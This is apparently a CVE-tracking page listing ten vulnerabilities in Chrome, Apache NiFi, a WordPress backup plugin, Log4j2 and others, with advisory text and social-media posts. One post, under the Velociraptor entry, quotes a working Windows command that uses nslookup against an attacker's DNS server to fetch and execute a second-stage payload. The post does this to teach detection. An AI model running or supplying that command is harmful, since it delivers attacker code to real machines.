24h | 7d | 30d

Overview

  • Google
  • Chrome

13 Feb 2026
Published
17 Feb 2026
Updated

CVSS
Pending
EPSS
0.03%

Description

Use after free in CSS in Google Chrome prior to 145.0.7632.75 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)

Statistics

  • 6 Posts

Last activity: 1 hour ago

Fediverse

Profile picture fallback

Geopolitical: US-Iran nuclear talks resumed in Geneva (Feb 16). The Pentagon is also reviewing ties with Anthropic over AI usage safeguards (Feb 16). Tech: Majorana qubits were decoded, marking a breakthrough for robust quantum computing (Feb 16). Cybersecurity: Google patched an actively exploited Chrome zero-day (CVE-2026-2441), and Japan's Washington Hotel disclosed a ransomware attack from Feb 13.

#AnonNews_irc #Cybersecurity #News

  • 0
  • 0
  • 0
  • 14h ago
Profile picture fallback

Google issued an emergency patch for an actively exploited Chrome zero-day (CVE-2026-2441) on Feb 16, 2026. A critical BeyondTrust vulnerability (CVE-2026-1731) is also under active exploitation. State-backed actors are increasingly using AI in cyberattacks. Geopolitically, the EU warned of Russia's evolving cyber warfare tactics. SpaceX and xAI are competing in a Pentagon AI drone tech contest.

#Cybersecurity #AI #Geopolitics

  • 0
  • 0
  • 0
  • 20h ago

Bluesky

Profile picture fallback
New Chrome Zero-Day (CVE-2026-2441) Under Active Attack — Patch Released URL: nvd.nist.gov/vuln/detail/... Classification: Critical, Solution: Official Fix, Exploit Maturity: Functional, CVSSv3.1: 8.8
  • 0
  • 0
  • 0
  • 15h ago
Profile picture fallback
Chrome, corretto il primo zero-day 2026 già sfruttato in attacchi Google ha corretto CVE-2026-2441, primo zero-day Chrome 2026 già sfruttato. Una falla use-... https://www.ilsoftware.it/chrome-corretto-il-primo-zero-day-2026-gia-sfruttato-in-attacchi/
  • 0
  • 0
  • 0
  • 13h ago
Profile picture fallback
🚨 Update Chrome NOW 🛎️ New Chrome Zero-Day (CVE-2026-2441) Under Active Attack — Patch Released thehackernews.com/2026/02/new-...
  • 0
  • 0
  • 0
  • 9h ago
Profile picture fallback
Google терміново оновлює Chrome для 3 млрд користувачів — знайдено нову вразливість. #новини #uazmi #технології #сша Google випустила термінове оновлення для Chrome через вразливість нульового дня CVE-2026-2441, яку вже використовують хакери. Про це пише американський Forbe...
  • 0
  • 0
  • 0
  • 1h ago

Overview

  • Apache Software Foundation
  • Apache NiFi
  • org.apache.nifi:nifi-web-api

17 Feb 2026
Published
17 Feb 2026
Updated

CVSS v4.0
HIGH (8.7)
EPSS
0.03%

KEV

Description

Apache NiFi 1.1.0 through 2.7.2 are missing authorization when updating configuration properties on extension components that have specific Required Permissions based on the Restricted annotation. The Restricted annotation indicates additional privileges required to add the annotated component to the flow configuration, but framework authorization did not check restricted status when updating a component previously added. The missing authorization requires a more privileged user to add a restricted component to the flow configuration, but permits a less privileged user to make property configuration changes. Apache NiFi installations that do not implement different levels of authorization for Restricted components are not subject to this vulnerability because the framework enforces write permissions as the security boundary. Upgrading to Apache NiFi 2.8.0 is the recommended mitigation.

Statistics

  • 3 Posts

Last activity: 2 hours ago

Fediverse

Profile picture fallback

🔥 HIGH severity vuln: CVE-2026-25903 in Apache NiFi 1.1.0 – 2.7.2 lets less-privileged users alter restricted component configs. Upgrade to 2.8.0 ASAP. Monitor permissions & flows! radar.offseq.com/threat/cve-20

  • 0
  • 0
  • 0
  • 12h ago

Bluesky

Profile picture fallback
🚨 CVE-2026-25903 – Apache NiFi Missing authorization in Apache NiFi (1.1.0–2.7.2) allows less privileged users to modify properties of Restricted components. CVSS: 8.7 (HIGH) Full analysis: basefortify.eu/cve_reports/... #CVE #ApacheNiFi #CyberSecurity #Vulnerability #InfoSec
  • 0
  • 0
  • 0
  • 11h ago

Overview

  • wpvividplugins
  • Migration, Backup, Staging – WPvivid Backup & Migration

11 Feb 2026
Published
11 Feb 2026
Updated

CVSS v3.1
CRITICAL (9.8)
EPSS
0.52%

KEV

Description

The Migration, Backup, Staging – WPvivid Backup & Migration plugin for WordPress is vulnerable to Unauthenticated Arbitrary File Upload in versions up to and including 0.9.123. This is due to improper error handling in the RSA decryption process combined with a lack of path sanitization when writing uploaded files. When the plugin fails to decrypt a session key using openssl_private_decrypt(), it does not terminate execution and instead passes the boolean false value to the phpseclib library's AES cipher initialization. The library treats this false value as a string of null bytes, allowing an attacker to encrypt a malicious payload using a predictable null-byte key. Additionally, the plugin accepts filenames from the decrypted payload without sanitization, enabling directory traversal to escape the protected backup directory. This makes it possible for unauthenticated attackers to upload arbitrary PHP files to publicly accessible directories and achieve Remote Code Execution via the wpvivid_action=send_to_site parameter.

Statistics

  • 2 Posts
  • 1 Interaction

Last activity: Last hour

Bluesky

Profile picture fallback
CVE-2026-1357 Exposed: How a WordPress Backup Plugin Turns Your Site into a Attacker’s Playground + Video Introduction: WordPress powers over 40% of the web, but its extensibility through plugins often introduces critical security gaps. The recently disclosed CVE-2026-1357 in the WPvivid Backup…
  • 0
  • 1
  • 0
  • 11h ago
Profile picture fallback
WordPressの人気 バックアップ プラグインWPvivid Backup & Migrationに重大な脆弱性(CVE-2026-1357) rocket-boys.co.jp/security-mea... #セキュリティ対策Lab #セキュリティ #Security #CybersecurityNews
  • 0
  • 0
  • 0
  • Last hour

Overview

  • Microsoft
  • Microsoft Configuration Manager

08 Oct 2024
Published
12 Feb 2026
Updated

CVSS v3.1
CRITICAL (9.8)
EPSS
87.46%

Description

Microsoft Configuration Manager Remote Code Execution Vulnerability

Statistics

  • 1 Post
  • 15 Interactions

Last activity: 12 hours ago

Fediverse

Profile picture fallback

Microsoft: Anderthalb Jahre alte Schwachstelle wird angegriffen

Im Oktober 2024 hat Microsoft (MS) eine Sicherheitslücke gestopft, die mit dem Risiko 9,8 von 10 eingestuft wurde. Oder sollten wir sagen: Hintertür? Die Schwachstelle CVE-2024-43468 besteht nämlich in einer unzureichenden Überprüfung und Reinigung von Benutzer-Eingaben. Will sagen: Wer die "passenden" Eingabewerte kennt, kann von Ferne und ohne Autorisierung Code ausführen (RCE, der GAU unter den Sicherheitslücken). Updates gegen diese Hintertür müssen sofort installiert werden - seit anderthalb Jahren! CVE-2024-43468 wurde gerade in den Katalog der bekanntermaßen ausgenutzten Sicherheitslücken (KEV) aufgenomm

pc-fluesterer.info/wordpress/2

#Allgemein #Hintergrund #Warnung #cybercrime #exploits #hintertür #Microsoft #UnplugTrump

  • 9
  • 6
  • 0
  • 12h ago

Overview

  • Microsoft
  • Windows Notepad

10 Feb 2026
Published
17 Feb 2026
Updated

CVSS v3.1
HIGH (7.8)
EPSS
0.08%

KEV

Description

Improper neutralization of special elements used in a command ('command injection') in Windows Notepad App allows an unauthorized attacker to execute code locally.

Statistics

  • 1 Post
  • 6 Interactions

Last activity: 18 hours ago

Bluesky

Profile picture fallback
Microsoft、Windowsのメモ帳に余計なAI機能に加え、リモートコード実行の脆弱性まで付与 | XenoSpectrum https://xenospectrum.com/windows-notepad-vulnerability-cve-2026-20841-ai-markdown/
  • 2
  • 4
  • 0
  • 18h ago

Overview

  • Pending

17 Feb 2026
Published
17 Feb 2026
Updated

CVSS
Pending
EPSS
Pending

KEV

Description

Rocket TRUfusion Enterprise through 7.10.4.0 uses a reverse proxy to handle incoming connections. However, the proxy is misconfigured in a way that allows specifying absolute URLs in the HTTP request line, causing the proxy to load the given resource.

Statistics

  • 2 Posts
  • 4 Interactions

Last activity: 16 hours ago

Fediverse

Profile picture fallback
[RSS] When Audits Fail Part 2: From Pre-Auth SSRF to RCE in TRUfusion Enterprise (CVE-2025-32355, CVE-2025-59793)

https://www.rcesecurity.com/2026/02/when-audits-fail-from-pre-auth-ssrf-to-rce-in-trufusion-enterprise/
  • 1
  • 2
  • 0
  • 16h ago

Bluesky

Profile picture fallback
[RSS] When Audits Fail Part 2: From Pre-Auth SSRF to RCE in TRUfusion Enterprise (CVE-2025-32355, CVE-2025-59793) www.rcesecurity.com -> Original->
  • 0
  • 1
  • 0
  • 16h ago

Overview

  • Pending

17 Feb 2026
Published
17 Feb 2026
Updated

CVSS
Pending
EPSS
Pending

KEV

Description

Rocket TRUfusion Enterprise through 7.10.5 exposes the endpoint at /axis2/services/WsPortalV6UpDwAxis2Impl to authenticated users to be able to upload files. However, the application doesn't properly sanitize the jobDirectory parameter, which allows path traversal sequences to be included. This allows writing files to arbitrary local filesystem locations and may subsequently lead to remote code execution.

Statistics

  • 2 Posts
  • 4 Interactions

Last activity: 16 hours ago

Fediverse

Profile picture fallback
[RSS] When Audits Fail Part 2: From Pre-Auth SSRF to RCE in TRUfusion Enterprise (CVE-2025-32355, CVE-2025-59793)

https://www.rcesecurity.com/2026/02/when-audits-fail-from-pre-auth-ssrf-to-rce-in-trufusion-enterprise/
  • 1
  • 2
  • 0
  • 16h ago

Bluesky

Profile picture fallback
[RSS] When Audits Fail Part 2: From Pre-Auth SSRF to RCE in TRUfusion Enterprise (CVE-2025-32355, CVE-2025-59793) www.rcesecurity.com -> Original->
  • 0
  • 1
  • 0
  • 16h ago

Overview

  • Pending

Pending
Published
Pending
Updated

CVSS
Pending
EPSS
Pending

KEV

Description

This candidate has been reserved by a CVE Numbering Authority (CNA). This record will be updated by the assigning CNA once details are available.

Statistics

  • 1 Post
  • 2 Interactions

Last activity: 7 hours ago

Bluesky

Profile picture fallback
URGENT: #Ubuntu 24.04 LTS kernel updates (USN-8028-3) are live. Critical patches for AMD CPU data leaks (CVE-2024-36351) and SEV-SNP guest memory overwrite flaws. Read more: 👉 tinyurl.com/53wmvedk #Security
  • 0
  • 2
  • 0
  • 7h ago

Overview

  • Rapid7
  • Velociraptor

20 Jun 2025
Published
28 Nov 2025
Updated

CVSS v3.1
MEDIUM (5.5)
EPSS
0.06%

KEV

Description

Velociraptor allows collection of VQL queries packaged into Artifacts from endpoints. These artifacts can be used to do anything and usually run with elevated permissions.  To limit access to some dangerous artifact, Velociraptor allows for those to require high permissions like EXECVE to launch. The Admin.Client.UpdateClientConfig is an artifact used to update the client's configuration. This artifact did not enforce an additional required permission, allowing users with COLLECT_CLIENT permissions (normally given by the "Investigator" role) to collect it from endpoints and update the configuration. This can lead to arbitrary command execution and endpoint takeover. To successfully exploit this vulnerability the user must already have access to collect artifacts from the endpoint (i.e. have the COLLECT_CLIENT given typically by the "Investigator' role).

Statistics

  • 1 Post
  • 2 Interactions

Last activity: 15 hours ago

Fediverse

Profile picture fallback

cmd /c "nslookup example.com 192.168.1[.]1 | findstr "^Name:" | for /f "tokens=1,* delims=:" %a in ('more') do @echo %b" | cmd && exit\1

To an untrained eye, the above command might not look suspicious, as it uses a legitimate Windows tool called nslookup, but in reality the command is part of a staged infection as it delivers a second-stage payload via DNS that is controlled by the attacker.

Just because a legitimate executable runs commands doesn't mean that the binary itself or its parameters can't be abused to deliver or execute something malicious. The same goes for Velociraptor version 0.73.4.0, which contains a privilege escalation vulnerability under CVE-2025-6264. It is a legitimate DFIR tool, but because of its vulnerability, ransomware gangs use it to elevate privileges and execute malicious commands with higher privileges.

When detecting malicious activity, context and the commands executed are very important, because one technique used by threat actors to stay undetected as long as possible is abusing legitimate tools or built-in Windows executables to draw less attention to their malicious activities. To an untrained eye, such commands can look legitimate because the executables are reputable, they may be attributed as false positives or fly under the radar if detection engineering is not mature enough.

  • 0
  • 2
  • 0
  • 15h ago

Overview

  • Apache Software Foundation
  • Apache Log4j2

10 Dec 2021
Published
21 Oct 2025
Updated

CVSS
Pending
EPSS
94.36%

Description

Apache Log4j2 2.0-beta9 through 2.15.0 (excluding security releases 2.12.2, 2.12.3, and 2.3.1) JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. An attacker who can control log messages or log message parameters can execute arbitrary code loaded from LDAP servers when message lookup substitution is enabled. From log4j 2.15.0, this behavior has been disabled by default. From version 2.16.0 (along with 2.12.2, 2.12.3, and 2.3.1), this functionality has been completely removed. Note that this vulnerability is specific to log4j-core and does not affect log4net, log4cxx, or other Apache Logging Services projects.

Statistics

  • 1 Post
  • 1 Interaction

Last activity: 3 hours ago

Bluesky

Profile picture fallback
Exploiting and Mitigating the Log4Shell Vulnerability: A Hands-On Guide + Video Introduction: The Log4Shell vulnerability (CVE-2021-44228) in the popular Apache Log4j2 logging library sent shockwaves through the cybersecurity community due to its ease of exploitation and widespread impact. This…
  • 0
  • 1
  • 0
  • 3h ago
Showing 1 to 10 of 35 CVEs